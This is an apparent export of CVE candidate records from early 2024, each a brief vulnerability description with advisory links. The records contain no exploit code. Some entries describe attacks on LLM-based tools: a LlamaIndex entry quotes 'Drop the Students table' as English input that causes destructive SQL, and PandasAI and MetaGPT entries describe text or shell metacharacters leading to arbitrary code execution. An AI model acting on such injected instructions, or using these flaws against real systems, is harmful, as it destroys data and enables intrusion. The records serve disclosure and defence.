CVE 2024 23821 Candidate GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. A stored cross-site scripting (XSS) vulnerability exists in versions prior to 2.23.4 and 2.24.1 that enables an authenticated administrator with workspace-level privileges to store a JavaScript payload in the GeoServer catalog that will execute in the context of another user's browser when viewed in the GWC Demos Page. Access to the GWC Demos Page is available to all users although data security may limit users' ability to trigger the XSS. Versions 2.23.4 and 2.24.1 contain a patch for this issue. MISC:https://github.com/GeoWebCache/geowebcache/issues/1171 | URL:https://github.com/GeoWebCache/geowebcache/issues/1171 | MISC:https://github.com/GeoWebCache/geowebcache/pull/1173 | URL:https://github.com/GeoWebCache/geowebcache/pull/1173 | MISC:https://github.com/geoserver/geoserver/security/advisories/GHSA-88wc-fcj9-q3r9 | URL:https://github.com/geoserver/geoserver/security/advisories/GHSA-88wc-fcj9-q3r9 Assigned (20240122)
CVE 2024 23820 Candidate OpenFGA, an authorization/permission engine, is vulnerable to a denial of service attack in versions prior to 1.4.3. In some scenarios that depend on the model and tuples used, a call to `ListObjects` may not release memory properly. So when a sufficiently high number of those calls are executed, the OpenFGA server can create an `out of memory` error and terminate. Version 1.4.3 contains a patch for this issue. MISC:https://github.com/openfga/openfga/commit/908ac85c8b7769c8042cca31886df8db01976c39 | URL:https://github.com/openfga/openfga/commit/908ac85c8b7769c8042cca31886df8db01976c39 | MISC:https://github.com/openfga/openfga/releases/tag/v1.4.3 | URL:https://github.com/openfga/openfga/releases/tag/v1.4.3 | MISC:https://github.com/openfga/openfga/security/advisories/GHSA-rxpw-85vw-fx87 | URL:https://github.com/openfga/openfga/security/advisories/GHSA-rxpw-85vw-fx87 Assigned (20240122)
CVE 2024 23819 Candidate GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. A stored cross-site scripting (XSS) vulnerability exists in versions prior to 2.23.4 and 2.24.1 that enables an authenticated administrator with workspace-level privileges to store a JavaScript payload in the GeoServer catalog that will execute in the context of another user's browser when viewed in the MapML HTML Page. The MapML extension must be installed and access to the MapML HTML Page is available to all users although data security may limit users' ability to trigger the XSS. Versions 2.23.4 and 2.24.1 contain a patch for this issue. MISC:https://github.com/geoserver/geoserver/commit/6f04adbdc6c289f5cb815b1462a6bd790e3fb6ef | URL:https://github.com/geoserver/geoserver/commit/6f04adbdc6c289f5cb815b1462a6bd790e3fb6ef | MISC:https://github.com/geoserver/geoserver/commit/df65ff05250cbb498c78af906d66e0c084ace8a1 | URL:https://github.com/geoserver/geoserver/commit/df65ff05250cbb498c78af906d66e0c084ace8a1 | MISC:https://github.com/geoserver/geoserver/pull/7175 | URL:https://github.com/geoserver/geoserver/pull/7175 | MISC:https://github.com/geoserver/geoserver/security/advisories/GHSA-7x76-57fr-m5r5 | URL:https://github.com/geoserver/geoserver/security/advisories/GHSA-7x76-57fr-m5r5 | MISC:https://osgeo-org.atlassian.net/browse/GEOS-11154 | URL:https://osgeo-org.atlassian.net/browse/GEOS-11154 Assigned (20240122)
CVE 2024 23818 Candidate GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. A stored cross-site scripting (XSS) vulnerability exists in versions prior to 2.23.3 and 2.24.1 that enables an authenticated administrator with workspace-level privileges to store a JavaScript payload in the GeoServer catalog that will execute in the context of another user's browser when viewed in the WMS GetMap OpenLayers Output Format. Access to the WMS OpenLayers Format is available to all users by default although data and service security may limit users' ability to trigger the XSS. Versions 2.23.3 and 2.24.1 contain a patch for this issue. MISC:https://github.com/geoserver/geoserver/commit/4557a832eed19ec18b9753cb97e8aa85269741d2 | URL:https://github.com/geoserver/geoserver/commit/4557a832eed19ec18b9753cb97e8aa85269741d2 | MISC:https://github.com/geoserver/geoserver/commit/a26c32a469ee4c599236380452ffb4260361bd6f | URL:https://github.com/geoserver/geoserver/commit/a26c32a469ee4c599236380452ffb4260361bd6f | MISC:https://github.com/geoserver/geoserver/pull/7174 | URL:https://github.com/geoserver/geoserver/pull/7174 | MISC:https://github.com/geoserver/geoserver/security/advisories/GHSA-fcpm-hchj-mh72 | URL:https://github.com/geoserver/geoserver/security/advisories/GHSA-fcpm-hchj-mh72 | MISC:https://osgeo-org.atlassian.net/browse/GEOS-11153 | URL:https://osgeo-org.atlassian.net/browse/GEOS-11153 Assigned (20240122)
CVE 2024 23817 Candidate Dolibarr is an enterprise resource planning (ERP) and customer relationship management (CRM) software package. Version 18.0.4 has a HTML Injection vulnerability in the Home page of the Dolibarr Application. This vulnerability allows an attacker to inject arbitrary HTML tags and manipulate the rendered content in the application's response. Specifically, I was able to successfully inject a new HTML tag into the returned document and, as a result, was able to comment out some part of the Dolibarr App Home page HTML code. This behavior can be exploited to perform various attacks like Cross-Site Scripting (XSS). To remediate the issue, validate and sanitize all user-supplied input, especially within HTML attributes, to prevent HTML injection attacks; and implement proper output encoding when rendering user-provided data to ensure it is treated as plain text rather than executable HTML. MISC:https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-7947-48q7-cp5m | URL:https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-7947-48q7-cp5m Assigned (20240122)
CVE 2024 23816 Candidate A vulnerability has been identified in Location Intelligence Perpetual Large (9DE5110-8CA13-1AX0) (All versions < V4.3), Location Intelligence Perpetual Medium (9DE5110-8CA12-1AX0) (All versions < V4.3), Location Intelligence Perpetual Non-Prod (9DE5110-8CA10-1AX0) (All versions < V4.3), Location Intelligence Perpetual Small (9DE5110-8CA11-1AX0) (All versions < V4.3), Location Intelligence SUS Large (9DE5110-8CA13-1BX0) (All versions < V4.3), Location Intelligence SUS Medium (9DE5110-8CA12-1BX0) (All versions < V4.3), Location Intelligence SUS Non-Prod (9DE5110-8CA10-1BX0) (All versions < V4.3), Location Intelligence SUS Small (9DE5110-8CA11-1BX0) (All versions < V4.3). Affected products use a hard-coded secret value for the computation of a Keyed-Hash Message Authentication Code. This could allow an unauthenticated remote attacker to gain full administrative access to the application. MISC:https://cert-portal.siemens.com/productcert/html/ssa-580228.html | URL:https://cert-portal.siemens.com/productcert/html/ssa-580228.html Assigned (20240122)
CVE 2024 23813 Candidate A vulnerability has been identified in Polarion ALM (All versions). The REST API endpoints of doorsconnector of the affected product lacks proper authentication. An unauthenticated attacker could access the endpoints, and potentially execute code. MISC:https://cert-portal.siemens.com/productcert/html/ssa-871717.html | URL:https://cert-portal.siemens.com/productcert/html/ssa-871717.html Assigned (20240122)
CVE 2024 23812 Candidate A vulnerability has been identified in SINEC NMS (All versions < V2.0 SP1). The affected application incorrectly neutralizes special elements when creating a report which could lead to command injection. MISC:https://cert-portal.siemens.com/productcert/html/ssa-943925.html | URL:https://cert-portal.siemens.com/productcert/html/ssa-943925.html Assigned (20240122)
CVE 2024 23811 Candidate A vulnerability has been identified in SINEC NMS (All versions < V2.0 SP1). The affected application allows users to upload arbitrary files via TFTP. This could allow an attacker to upload malicious firmware images or other files, that could potentially lead to remote code execution. MISC:https://cert-portal.siemens.com/productcert/html/ssa-943925.html | URL:https://cert-portal.siemens.com/productcert/html/ssa-943925.html Assigned (20240122)
CVE 2024 23810 Candidate A vulnerability has been identified in SINEC NMS (All versions < V2.0 SP1). The affected application is vulnerable to SQL injection. This could allow an unauthenticated remote attacker to execute arbitrary SQL queries on the server database. MISC:https://cert-portal.siemens.com/productcert/html/ssa-943925.html | URL:https://cert-portal.siemens.com/productcert/html/ssa-943925.html Assigned (20240122)
CVE 2024 23809 Candidate A double-free vulnerability exists in the BrainVision ASCII Header Parsing functionality of The Biosig Project libbiosig 2.5.0 and Master Branch (ab0ee111). A specially crafted .vdhr file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability. MISC:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1919 | URL:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1919 Assigned (20240122)
CVE 2024 23807 Candidate The Apache Xerces C++ XML parser on versions 3.0.0 before 3.2.5 contains a use-after-free error triggered during the scanning of external DTDs. Users are recommended to upgrade to version 3.2.5 which fixes the issue, or mitigate the issue by disabling DTD processing. This can be accomplished via the DOM using a standard parser feature, or via SAX using the XERCES_DISABLE_DTD environment variable. This issue has been disclosed before as CVE-2018-1311, but unfortunately that advisory incorrectly stated the issue would be fixed in version 3.2.3 or 3.2.4. MISC:https://github.com/apache/xerces-c/pull/54 | URL:https://github.com/apache/xerces-c/pull/54 | MISC:https://lists.apache.org/thread/c497tgn864tsbm8w0bo3f0d81s07zk9r | URL:https://lists.apache.org/thread/c497tgn864tsbm8w0bo3f0d81s07zk9r Assigned (20240122)
CVE 2024 23806 Candidate Sensitive data can be extracted from HID iCLASS SE reader configuration cards. This could include credential and device administrator keys. MISC:https://https://www.cisa.gov/news-events/ics-advisories/icsa-24-037-02 | URL:https://https://www.cisa.gov/news-events/ics-advisories/icsa-24-037-02 | MISC:https://www.hidglobal.com/support | URL:https://www.hidglobal.com/support Assigned (20240125)
CVE 2024 23805 Candidate Undisclosed requests can cause the Traffic Management Microkernel (TMM) to terminate. For the Application Visibility and Reporting module, this may occur when the HTTP Analytics profile with URLs enabled under Collected Entities is configured on a virtual server and the DB variables avr.IncludeServerInURI or avr.CollectOnlyHostnameFromURI are enabled. For BIG-IP Advanced WAF and ASM, this may occur when either a DoS or Bot Defense profile is configured on a virtual server and the DB variables avr.IncludeServerInURI or avr.CollectOnlyHostnameFromURI are enabled. Note: The DB variables avr.IncludeServerInURI and avr.CollectOnlyHostnameFromURI are not enabled by default. For more information about the HTTP Analytics profile and the Collect URLs setting, refer to K30875743: Create a new Analytics profile and attach it to your virtual servers https://my.f5.com/manage/s/article/K30875743 . Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated MISC:https://my.f5.com/manage/s/article/K000137334 | URL:https://my.f5.com/manage/s/article/K000137334 Assigned (20240201)
CVE 2024 23804 Candidate A vulnerability has been identified in Tecnomatix Plant Simulation V2201 (All versions < V2201.0012), Tecnomatix Plant Simulation V2302 (All versions < V2302.0006). The affected applications contain a stack overflow vulnerability while parsing specially crafted PSOBJ files. This could allow an attacker to execute code in the context of the current process. MISC:https://cert-portal.siemens.com/productcert/html/ssa-017796.html | URL:https://cert-portal.siemens.com/productcert/html/ssa-017796.html Assigned (20240122)
CVE 2024 23803 Candidate A vulnerability has been identified in Tecnomatix Plant Simulation V2201 (All versions), Tecnomatix Plant Simulation V2302 (All versions < V2302.0007). The affected application contains an out of bounds write past the end of an allocated buffer while parsing a specially crafted SPP file. This could allow an attacker to execute code in the context of the current process. MISC:https://cert-portal.siemens.com/productcert/html/ssa-017796.html | URL:https://cert-portal.siemens.com/productcert/html/ssa-017796.html Assigned (20240122)
CVE 2024 23802 Candidate A vulnerability has been identified in Tecnomatix Plant Simulation V2201 (All versions < V2201.0012), Tecnomatix Plant Simulation V2302 (All versions < V2302.0006). The affected applications contain an out of bounds read past the end of an allocated structure while parsing specially crafted SPP files. This could allow an attacker to execute code in the context of the current process. MISC:https://cert-portal.siemens.com/productcert/html/ssa-017796.html | URL:https://cert-portal.siemens.com/productcert/html/ssa-017796.html Assigned (20240122)
CVE 2024 23801 Candidate A vulnerability has been identified in Tecnomatix Plant Simulation V2201 (All versions), Tecnomatix Plant Simulation V2302 (All versions < V2302.0007). The affected applications contain a null pointer dereference vulnerability while parsing specially crafted SPP files. An attacker could leverage this vulnerability to crash the application causing denial of service condition. MISC:https://cert-portal.siemens.com/productcert/html/ssa-017796.html | URL:https://cert-portal.siemens.com/productcert/html/ssa-017796.html Assigned (20240122)
CVE 2024 23798 Candidate A vulnerability has been identified in Tecnomatix Plant Simulation V2201 (All versions < V2201.0012), Tecnomatix Plant Simulation V2302 (All versions < V2302.0006). The affected applications contain a stack overflow vulnerability while parsing specially crafted WRL files. This could allow an attacker to execute code in the context of the current process. MISC:https://cert-portal.siemens.com/productcert/html/ssa-017796.html | URL:https://cert-portal.siemens.com/productcert/html/ssa-017796.html Assigned (20240122)
CVE 2024 23796 Candidate A vulnerability has been identified in Tecnomatix Plant Simulation V2201 (All versions < V2201.0012), Tecnomatix Plant Simulation V2302 (All versions < V2302.0006). The affected application is vulnerable to heap-based buffer overflow while parsing specially crafted WRL files. This could allow an attacker to execute code in the context of the current process. MISC:https://cert-portal.siemens.com/productcert/html/ssa-017796.html | URL:https://cert-portal.siemens.com/productcert/html/ssa-017796.html Assigned (20240122)
CVE 2024 23795 Candidate A vulnerability has been identified in Tecnomatix Plant Simulation V2201 (All versions < V2201.0012), Tecnomatix Plant Simulation V2302 (All versions < V2302.0006). The affected application contains an out of bounds write past the end of an allocated buffer while parsing a specially crafted WRL file. This could allow an attacker to execute code in the context of the current process. MISC:https://cert-portal.siemens.com/productcert/html/ssa-017796.html | URL:https://cert-portal.siemens.com/productcert/html/ssa-017796.html Assigned (20240122)
CVE 2024 23792 Candidate When adding attachments to ticket comments, another user can add attachments as well impersonating the orginal user. The attack requires a logged-in other user to know the UUID. While the legitimate user completes the comment, the malicious user can add more files to the comment. This issue affects OTRS: from 7.0.X through 7.0.48, from 8.0.X through 8.0.37, from 2023.X through 2023.1.1. MISC:https://otrs.com/release-notes/otrs-security-advisory-2024-03/ | URL:https://otrs.com/release-notes/otrs-security-advisory-2024-03/ Assigned (20240122)
CVE 2024 23791 Candidate Insertion of debug information into log file during building the elastic search index allows reading of sensitive information from articles.This issue affects OTRS: from 7.0.X through 7.0.48, from 8.0.X through 8.0.37, from 2023.X through 2023.1.1. MISC:https://otrs.com/release-notes/otrs-security-advisory-2024-02/ | URL:https://otrs.com/release-notes/otrs-security-advisory-2024-02/ Assigned (20240122)
CVE 2024 23790 Candidate Improper Input Validation vulnerability in the upload functionality for user avatars allows functionality misuse due to missing check of filetypes. This issue affects OTRS: from 7.0.X through 7.0.48, from 8.0.X through 8.0.37, from 2023 through 2023.1.1. MISC:https://otrs.com/release-notes/otrs-security-advisory-2024-01/ | URL:https://otrs.com/release-notes/otrs-security-advisory-2024-01/ Assigned (20240122)
CVE 2024 23789 Candidate Energy Management Controller with Cloud Services JH-RVB1 /JH-RV11 Ver.B0.1.9.1 and earlier allows a network-adjacent unauthenticated attacker to execute an arbitrary OS command on the affected product. MISC:https://jp.sharp/support/taiyo/info/JVNVU94591337_en.pdf | URL:https://jp.sharp/support/taiyo/info/JVNVU94591337_en.pdf | MISC:https://jp.sharp/support/taiyo/info/JVNVU94591337_jp.pdf | URL:https://jp.sharp/support/taiyo/info/JVNVU94591337_jp.pdf | MISC:https://jvn.jp/en/vu/JVNVU94591337/ | URL:https://jvn.jp/en/vu/JVNVU94591337/ Assigned (20240122)
CVE 2024 23788 Candidate Server-side request forgery vulnerability in Energy Management Controller with Cloud Services JH-RVB1 /JH-RV11 Ver.B0.1.9.1 and earlier allows a network-adjacent unauthenticated attacker to send an arbitrary HTTP request (GET) from the affected product. MISC:https://jp.sharp/support/taiyo/info/JVNVU94591337_en.pdf | URL:https://jp.sharp/support/taiyo/info/JVNVU94591337_en.pdf | MISC:https://jp.sharp/support/taiyo/info/JVNVU94591337_jp.pdf | URL:https://jp.sharp/support/taiyo/info/JVNVU94591337_jp.pdf | MISC:https://jvn.jp/en/vu/JVNVU94591337/ | URL:https://jvn.jp/en/vu/JVNVU94591337/ Assigned (20240122)
CVE 2024 23787 Candidate Path traversal vulnerability in Energy Management Controller with Cloud Services JH-RVB1 /JH-RV11 Ver.B0.1.9.1 and earlier allows a network-adjacent unauthenticated attacker to obtain an arbitrary file in the affected product. MISC:https://jp.sharp/support/taiyo/info/JVNVU94591337_en.pdf | URL:https://jp.sharp/support/taiyo/info/JVNVU94591337_en.pdf | MISC:https://jp.sharp/support/taiyo/info/JVNVU94591337_jp.pdf | URL:https://jp.sharp/support/taiyo/info/JVNVU94591337_jp.pdf | MISC:https://jvn.jp/en/vu/JVNVU94591337/ | URL:https://jvn.jp/en/vu/JVNVU94591337/ Assigned (20240122)
CVE 2024 23786 Candidate Cross-site scripting vulnerability in Energy Management Controller with Cloud Services JH-RVB1 /JH-RV11 Ver.B0.1.9.1 and earlier allows a network-adjacent unauthenticated attacker to execute an arbitrary script on the web browser of the user who is accessing the management page of the affected product. MISC:https://jp.sharp/support/taiyo/info/JVNVU94591337_en.pdf | URL:https://jp.sharp/support/taiyo/info/JVNVU94591337_en.pdf | MISC:https://jp.sharp/support/taiyo/info/JVNVU94591337_jp.pdf | URL:https://jp.sharp/support/taiyo/info/JVNVU94591337_jp.pdf | MISC:https://jvn.jp/en/vu/JVNVU94591337/ | URL:https://jvn.jp/en/vu/JVNVU94591337/ Assigned (20240122)
CVE 2024 23785 Candidate Cross-site request forgery vulnerability in Energy Management Controller with Cloud Services JH-RVB1 /JH-RV11 Ver.B0.1.9.1 and earlier allows a remote unauthenticated attacker to change the product settings. MISC:https://jp.sharp/support/taiyo/info/JVNVU94591337_en.pdf | URL:https://jp.sharp/support/taiyo/info/JVNVU94591337_en.pdf | MISC:https://jp.sharp/support/taiyo/info/JVNVU94591337_jp.pdf | URL:https://jp.sharp/support/taiyo/info/JVNVU94591337_jp.pdf | MISC:https://jvn.jp/en/vu/JVNVU94591337/ | URL:https://jvn.jp/en/vu/JVNVU94591337/ Assigned (20240122)
CVE 2024 23784 Candidate Improper access control vulnerability exists in Energy Management Controller with Cloud Services JH-RVB1 /JH-RV11 Ver.B0.1.9.1 and earlier, which may allow a network-adjacent unauthenticated attacker to obtain a username and its hashed password displayed on the management page of the affected product. MISC:https://jp.sharp/support/taiyo/info/JVNVU94591337_en.pdf | URL:https://jp.sharp/support/taiyo/info/JVNVU94591337_en.pdf | MISC:https://jp.sharp/support/taiyo/info/JVNVU94591337_jp.pdf | URL:https://jp.sharp/support/taiyo/info/JVNVU94591337_jp.pdf | MISC:https://jvn.jp/en/vu/JVNVU94591337/ | URL:https://jvn.jp/en/vu/JVNVU94591337/ Assigned (20240122)
CVE 2024 23783 Candidate Improper authentication vulnerability in Energy Management Controller with Cloud Services JH-RVB1 /JH-RV11 Ver.B0.1.9.1 and earlier allows a network-adjacent unauthenticated attacker to access the affected product without authentication. MISC:https://jp.sharp/support/taiyo/info/JVNVU94591337_en.pdf | URL:https://jp.sharp/support/taiyo/info/JVNVU94591337_en.pdf | MISC:https://jp.sharp/support/taiyo/info/JVNVU94591337_jp.pdf | URL:https://jp.sharp/support/taiyo/info/JVNVU94591337_jp.pdf | MISC:https://jvn.jp/en/vu/JVNVU94591337/ | URL:https://jvn.jp/en/vu/JVNVU94591337/ Assigned (20240122)
CVE 2024 23782 Candidate Cross-site scripting vulnerability exists in a-blog cms Ver.3.1.x series versions prior to Ver.3.1.7, Ver.3.0.x series versions prior to Ver.3.0.29, Ver.2.11.x series versions prior to Ver.2.11.58, Ver.2.10.x series versions prior to Ver.2.10.50, and Ver.2.9.0 and earlier versions. If this vulnerability is exploited, a user with a contributor or higher privilege may execute an arbitrary script on the web browser of the user who accessed the website using the product. MISC:https://developer.a-blogcms.jp/blog/news/JVN-34565930.html | URL:https://developer.a-blogcms.jp/blog/news/JVN-34565930.html | MISC:https://jvn.jp/en/jp/JVN34565930/ | URL:https://jvn.jp/en/jp/JVN34565930/ Assigned (20240122)
CVE 2024 23775 Candidate Integer Overflow vulnerability in Mbed TLS 2.x before 2.28.7 and 3.x before 3.5.2, allows attackers to cause a denial of service (DoS) via mbedtls_x509_set_extension(). FEDORA:FEDORA-2024-bfd98be425 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IIBPEYSVRK4IFLBSYJAWKH33YBNH5HR2/ | FEDORA:FEDORA-2024-c7f1c839ac | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GP5UU7Z6LJNBLBT4SC5WWS2HDNMTFZH5/ | MISC:https://mbed-tls.readthedocs.io/en/latest/security-advisories/mbedtls-security-advisory-2024-01-2/ Assigned (20240122)
CVE 2024 23771 Candidate darkhttpd before 1.15 uses strcmp (which is not constant time) to verify authentication, which makes it easier for remote attackers to bypass authentication via a timing side channel. MISC:https://github.com/emikulic/darkhttpd/commit/f477619d49f3c4de9ad59bd194265a48ddc03f04 | MISC:https://github.com/emikulic/darkhttpd/compare/v1.14...v1.15 | MLIST:[oss-security] 20240125 Re: darkhttpd: timing attack and local leak of HTTP basic auth credentials | URL:http://www.openwall.com/lists/oss-security/2024/01/25/1 Assigned (20240122)
CVE 2024 23770 Candidate darkhttpd through 1.15 allows local users to discover credentials (for --auth) by listing processes and their arguments. MISC:https://github.com/emikulic/darkhttpd/commit/2b339828b2a42a5fda105ea84934957a7d23e35d | MISC:https://github.com/emikulic/darkhttpd/compare/v1.14...v1.15 | MLIST:[oss-security] 20240125 Re: darkhttpd: timing attack and local leak of HTTP basic auth credentials | URL:http://www.openwall.com/lists/oss-security/2024/01/25/1 Assigned (20240122)
CVE 2024 23769 Candidate Improper privilege control for the named pipe in Samsung Magician PC Software 8.0.0 (for Windows) allows a local attacker to read privileged data. MISC:https://semiconductor.samsung.com/support/quality-support/product-security-updates/ Assigned (20240122)
CVE 2024 23768 Candidate Dremio before 24.3.1 allows path traversal. An authenticated user who has no privileges on certain folders (and the files and datasets in these folders) can access these folders, files, and datasets. To be successful, the user must have access to the source and at least one folder in the source. Affected versions are: 24.0.0 through 24.3.0, 23.0.0 through 23.2.3, and 22.0.0 through 22.2.2. Fixed versions are: 24.3.1 and later, 23.2.4 and later, and 22.2.3 and later. MISC:https://docs.dremio.com/current/reference/bulletins/2024-01-12-01 Assigned (20240122)
CVE 2024 23764 Candidate Certain WithSecure products allow Local Privilege Escalation. This affects WithSecure Client Security 15 and later, WithSecure Server Security 15 and later, WithSecure Email and Server Security 15 and later, and WithSecure Elements Endpoint Protection 17 and later. MISC:https://www.withsecure.com/en/support/security-advisories | MISC:https://www.withsecure.com/en/support/security-advisories/cve-2024-23764 Assigned (20240122)
CVE 2024 23763 Candidate SQL Injection vulnerability in Gambio through 4.9.2.0 allows attackers to run arbitrary SQL commands via crafted GET request using modifiers[attribute][] parameter. MISC:https://herolab.usd.de/security-advisories/usd-2023-0047/ Assigned (20240122)
CVE 2024 23762 Candidate Unrestricted File Upload vulnerability in Content Manager feature in Gambio 4.9.2.0 allows attackers to execute arbitrary code via upload of crafted PHP file. MISC:https://herolab.usd.de/security-advisories/usd-2023-0049/ Assigned (20240122)
CVE 2024 23761 Candidate Server Side Template Injection in Gambio 4.9.2.0 allows attackers to run arbitrary code via crafted smarty email template. MISC:https://herolab.usd.de/security-advisories/usd-2023-0048/ Assigned (20240122)
CVE 2024 23760 Candidate Cleartext Storage of Sensitive Information in Gambio 4.9.2.0 allows attackers to obtain sensitive information via error-handler.log.json and legacy-error-handler.log.txt under the webroot. MISC:https://herolab.usd.de/security-advisories/usd-2023-0050/ Assigned (20240122)
CVE 2024 23759 Candidate Deserialization of Untrusted Data in Gambio through 4.9.2.0 allows attackers to run arbitrary code via "search" parameter of the Parcelshopfinder/AddAddressBookEntry" function. MISC:https://herolab.usd.de/security-advisories/usd-2023-0046/ Assigned (20240122)
CVE 2024 23758 Candidate An issue discovered in Unisys Stealth 5.3.062.0 allows attackers to view sensitive information via the Enterprise ManagementInstaller_msi.log file. MISC:https://public.support.unisys.com/common/public/vulnerability/NVD_Detail_Rpt.aspx?ID=70 Assigned (20240122)
CVE 2024 23756 Candidate The HTTP PUT and DELETE methods are enabled in the Plone official Docker version 5.2.13 (5221), allowing unauthenticated attackers to execute dangerous actions such as uploading files to the server or deleting them. MISC:https://github.com/c0d3x27/CVEs/tree/main/CVE-2024-23756 Assigned (20240122)
CVE 2024 23755 Candidate ClickUp Desktop before 3.3.77 on macOS and Windows allows code injection because of specific Electron Fuses. There is inadequate protection against code injection through settings such as RunAsNode. MISC:https://clickup.com/security/disclosures | MISC:https://clickup.com/terms/security-policy | MISC:https://www.electronjs.org/blog/statement-run-as-node-cves | MISC:https://www.electronjs.org/docs/latest/tutorial/fuses Assigned (20240122)
CVE 2024 23752 Candidate GenerateSDFPipeline in synthetic_dataframe in PandasAI (aka pandas-ai) through 1.5.17 allows attackers to trigger the generation of arbitrary Python code that is executed by SDFCodeExecutor. An attacker can create a dataframe that provides an English language specification of this Python code. NOTE: the vendor previously attempted to restrict code execution in response to a separate issue, CVE-2023-39660. MISC:https://github.com/gventuri/pandas-ai/issues/868 Assigned (20240122)
CVE 2024 23751 Candidate LlamaIndex (aka llama_index) through 0.9.34 allows SQL injection via the Text-to-SQL feature in NLSQLTableQueryEngine, SQLTableRetrieverQueryEngine, NLSQLRetriever, RetrieverQueryEngine, and PGVectorSQLQueryEngine. For example, an attacker might be able to delete this year's student records via "Drop the Students table" within English language input. MISC:https://github.com/run-llama/llama_index/issues/9957 Assigned (20240122)
CVE 2024 23750 Candidate MetaGPT through 0.6.4 allows the QaEngineer role to execute arbitrary code because RunCode.run_script() passes shell metacharacters to subprocess.Popen. MISC:https://github.com/geekan/MetaGPT/issues/731 Assigned (20240122)
CVE 2024 23749 Candidate KiTTY versions 0.76.1.13 and before is vulnerable to command injection via the filename variable, occurs due to insufficient input sanitization and validation, failure to escape special characters, and insecure system calls (at lines 2369-2390). This allows an attacker to add inputs inside the filename variable, leading to arbitrary code execution. FULLDISC:20240213 Buffer Overflow Vulnerabilities in KiTTY Start Duplicated Session Hostname (CVE-2024-25003) & Username (CVE-2024-25004) Variables | URL:http://seclists.org/fulldisclosure/2024/Feb/14 | FULLDISC:20240213 Command Injection Vulnerability in KiTTY Get Remote File Through SCP Input (CVE-2024-23749) | URL:http://seclists.org/fulldisclosure/2024/Feb/13 | MISC:http://packetstormsecurity.com/files/177031/KiTTY-0.76.1.13-Command-Injection.html | MISC:https://blog.defcesco.io/CVE-2024-23749 Assigned (20240121)
CVE 2024 23747 Candidate The Moderna Sistemas ModernaNet Hospital Management System 2024 is susceptible to an Insecure Direct Object Reference (IDOR) vulnerability. This vulnerability resides in the system's handling of user data access through a /Modernanet/LAUDO/LAU0000100/Laudo?id= URI. By manipulating this id parameter, an attacker can gain access to sensitive medical information. MISC:https://github.com/louiselalanne/CVE-2024-23747 | MISC:https://modernasistemas.com.br/sitems/ Assigned (20240121)
CVE 2024 23746 Candidate Miro Desktop 0.8.18 on macOS allows local Electron code injection via a complex series of steps that might be usable in some environments (bypass a kTCCServiceSystemPolicyAppBundles requirement via a file copy, an app.app/Contents rename, an asar modification, and a rename back to app.app/Contents). MISC:https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection | MISC:https://github.com/louiselalanne/CVE-2024-23746 | MISC:https://miro.com/about/ | MISC:https://www.electronjs.org/blog/statement-run-as-node-cves Assigned (20240121)
CVE 2024 23745 Candidate ** DISPUTED ** In Notion Web Clipper 1.0.3(7), a .nib file is susceptible to the Dirty NIB attack. NIB files can be manipulated to execute arbitrary commands. Additionally, even if a NIB file is modified within an application, Gatekeeper may still permit the execution of the application, enabling the execution of arbitrary commands within the application's context. NOTE: the vendor's perspective is that this is simply an instance of CVE-2022-48505, cannot properly be categorized as a product-level vulnerability, and cannot have a product-level fix because it is about incorrect caching of file signatures on macOS. MISC:https://blog.xpnsec.com/dirtynib/ | MISC:https://chromium.googlesource.com/chromium/src/+/master/docs/security/faq.md#Why-arent-physically_local-attacks-in-Chromes-threat-model | MISC:https://github.com/louiselalanne/CVE-2024-23745 Assigned (20240121)
CVE 2024 23744 Candidate An issue was discovered in Mbed TLS 3.5.1. There is persistent handshake denial if a client sends a TLS 1.3 ClientHello without extensions. MISC:https://github.com/Mbed-TLS/mbedtls/issues/8694 Assigned (20240121)
CVE 2024 23743 Candidate ** DISPUTED ** Notion through 3.1.0 on macOS might allow code execution because of RunAsNode and enableNodeClilnspectArguments. NOTE: the vendor states "the attacker must launch the Notion Desktop application with nonstandard flags that turn the Electron-based application into a Node.js execution environment." MISC:https://github.com/V3x0r/CVE-2024-23743 | MISC:https://github.com/r3ggi/electroniz3r | MISC:https://www.electronjs.org/blog/statement-run-as-node-cves Assigned (20240121)
CVE 2024 23742 Candidate ** DISPUTED ** An issue in Loom on macOS version 0.196.1 and before, allows remote attackers to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments settings. NOTE: the vendor disputes this because it requires local access to a victim's machine. MISC:https://github.com/V3x0r/CVE-2024-23742 | MISC:https://www.electronjs.org/blog/statement-run-as-node-cves Assigned (20240121)
CVE 2024 23741 Candidate An issue in Hyper on macOS version 3.4.1 and before, allows remote attackers to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments settings. MISC:https://github.com/V3x0r/CVE-2024-23741 | MISC:https://www.electronjs.org/blog/statement-run-as-node-cves Assigned (20240121)
CVE 2024 23740 Candidate An issue in Kap for macOS version 3.6.0 and before, allows remote attackers to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments settings. MISC:https://github.com/V3x0r/CVE-2024-23740 | MISC:https://www.electronjs.org/blog/statement-run-as-node-cves Assigned (20240121)
CVE 2024 23739 Candidate An issue in Discord for macOS version 0.0.291 and before, allows remote attackers to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments settings. MISC:https://github.com/V3x0r/CVE-2024-23739 | MISC:https://www.electronjs.org/blog/statement-run-as-node-cves Assigned (20240121)
CVE 2024 23738 Candidate ** DISPUTED ** An issue in Postman version 10.22 and before on macOS allows a remote attacker to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments settings. NOTE: the vendor states "we dispute the report's accuracy ... the configuration does not enable remote code execution.." MISC:https://github.com/V3x0r/CVE-2024-23738 | MISC:https://www.electronjs.org/blog/statement-run-as-node-cves Assigned (20240121)
CVE 2024 23732 Candidate The JSON loader in Embedchain before 0.1.57 allows a ReDoS (regular expression denial of service) via a long string to json.py. MISC:https://github.com/embedchain/embedchain/compare/0.1.56...0.1.57 | MISC:https://github.com/embedchain/embedchain/pull/1122 Assigned (20240121)
